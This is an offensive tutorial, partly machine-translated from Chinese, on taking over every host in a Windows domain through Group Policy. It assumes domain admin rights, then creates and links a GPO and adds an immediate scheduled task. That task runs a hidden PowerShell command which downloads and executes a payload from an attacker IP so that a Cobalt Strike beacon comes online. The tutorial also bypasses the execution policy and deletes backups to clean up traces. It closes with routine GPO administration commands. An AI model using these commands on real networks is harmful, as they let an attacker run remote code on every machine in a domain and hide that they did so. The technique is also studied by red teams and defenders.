premise
Have the authority to change a certain group policy or domain management authority
Achievable effect
One-time control of all hosts in the domain configured with the specified group policy
Use ideas
Here is the original words of Miyoshi students:
According to different situations, there are the following two utilization ideas:
1. Create a new group strategy, create a scheduled task to achieve remote execution
- Create a new GPO and link to the corresponding domain
- Backup GPO
- Modify Backup.xml and gpreport.xml
- Create ScheduledTasks.xml
- Restore GPO to force client refresh policy
- Clean up operation traces
第二步到第五步可以通过脚本直接实现
2. Modify the existing group strategy and replace the scheduled task
- If there are policies on the domain controller and scheduled tasks are configured
- No need to register anymore, just modify ScheduledTasks.xml
achieve
Here we are divided into two implementation methods, in the graphical interface and cmd command line.
cmd command line environment
Sometimes we don't have a graphical interface and need to do this in this way. At this time, it is assumed that we have domain management authority.
-
Create GPO
powershell -c new-gpo -name TestGPO1
-
链接GPO
powershell -c New-GPLink -Name TestGPO1 -Target ‘dc=test,dc=com’
-
Modify GPO and add immediate tasks
即时任务会在组策略同步的时候强制执行一次,组策略每90分钟自动同步一次。
The following commands need to be executed in powershell:
Set-ExecutionPolicy Bypass -Scope Process #绕过执行策略
Import-Module C:\Users\Administrator\Desktop\1.ps1 #导入脚本文件
script file download address: https://github.com/3gstudent/Homework-of-Powershell/blob/master/New-GPOImmediateTask.ps1
New-GPOImmediateTask -TaskName Debugging -GPODisplayName TestGPO1 -SysPath '\\dc.test.com\sysvol\test.com' -CommandArguments ‘-nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('‘http://192.168.124.138:80/a'’))”‘ # 添加即时任务
/del /q /f ”{xxxxxx}“ # 删除对应的备份文件
Graphical interface implementation
Open the group policy management, alt+ r, enter gpmc.msc in the run box to enter, and then enter the following figure.
View which group policies are loaded in the current domain
Right-click a group policy associated with the domain and click Edit:
Enter the option of scheduled tasks.
Right-click on the blank space to create an instant task.
Fill in the task name and switch to the action bar. You
can create a new task and
click OK. After that, you will return to this page. Click Enter instead of the cross in the upper right corner of the page.
After the above operations are completed, you can use the gpupdate /force command on the client to force the synchronization of the group policy, and then you will see that the CS is online. You can also wait 90 minutes for group policies to be automatically synchronized.
Other knowledge
Trivial knowledge about GPO files
{6AC1786C-016F-11D2-945F-00C04fB984F9} Corresponding to Default Domain Controllers Policy
{31B2F340-016D-11D2-945F-00C04FB984F9}
The configuration file corresponding to the Default Domain Policy scheduled task is placed in the following place, which is the
content of the xml file in the figure It looks like this
Powershell function parameter transfer related
But when we want to transmit the powershell command, if the parameter contains a single quotation mark "'", then we need to escape it. The way to escape is to add a single quotation mark before it. And when the powershell function passes parameters, try to expand the single quotes. The system will only transmit the content between the two single quotes as a string instead of as a command, which reduces the probability of error.
Other common operations of GPO
The general operations are as follows:
Load the GroupPolicy module:
Import-Module GroupPolicy –verbose
Get the contents of all GPOs:
Get-GPO -All
Export all GPOs as an HTML report:
Get-GPOReport -All -ReportType html -Path C:\GposReport\GposReport.html
Export each GPO to an HTML report separately:
Get-GPO -All | %{ Get-GPOReport -name $_.displayname -ReportType html -path ("c:\GPOReports\"+$_.displayname+".html") }
View the permission settings of the specified GPO:
Get-GPPermission -Name "TestGPO1" -All
Link the GPO to the specified OU to
powershell -c New-GPLink -Name TestGPO1 -Target ‘OU=OUTest1,dc=test,dc=com’
backup the specified GPO:
Backup-Gpo -Name TestGPO1 -Path C:\GpoBackups
Back up all GPOs:
Backup-Gpo -All -Path "c:\GpoBackups"
Restore the specified GPO:
Restore-GPO -Name TestGPO1 -Path C:\GpoBackups
Restore all GPOs:
Restore-GPO -All -Path "c:\GpoBackups"
Create OU:
New-ADOrganizationalUnit -Name OUTest1 -Path "dc=test,dc=com"
View all computers in the current domain:
dsquery computer
Get the result "CN=Computer1,CN=Computers,DC=test,DC=com"Add this computer to OU=OUTest1:
dsmove "CN=Computer1,CN=Computers,DC=test,DC=com" -newparent OU=OUTest1,dc=test,dc=com
Query the computers in OU=OUTest1:
dsquery computer OU=OUTest1,dc=test,dc=com
Create GPO and connect:
new-gpo -name TestGPO | new-gplink -Target "OU=OUTest1,dc=test,dc=com"
Restore: Remove Computer1 from OU=OUTest1
dsmove "CN=Computer1,OU=OUTest1,DC=test,DC=com" -newparent CN=Computers,dc=test,dc=com
Delete OU=OUTest1:
set-ADOrganizationalUnit -Identity "OU=OUTest1,dc=test,dc=com" -ProtectedFromAccidentalDeletion $false
Remove-ADOrganizationalUnit -Identity "OU=OUTest1,dc=test,dc=com" -Recursive -Confirm:$False
View the modification permissions for group policy
icacls \\test.com\sysvol\test.com\policies\*
1, F = Full Control
- 777
2, CI = Container Inherit - This flag indicates that subordinate
containers will inherit this ACE.
- Subfolders inherit parent folder permissions
3, OI = Object Inherit - This flag indicates that subordinate files
will inherit the ACE.
- Child file inherits parent folder permissions
4, /T = Apply recursively to existing files and sub-folders. (OI and
CI only apply to new files and sub-folders).
- Recursive transfer of permissions
Reference article: Domain Penetration-Using the scheduled tasks in GPO to implement remote execution of
Windows intranet protocol. Learning LDAP group policy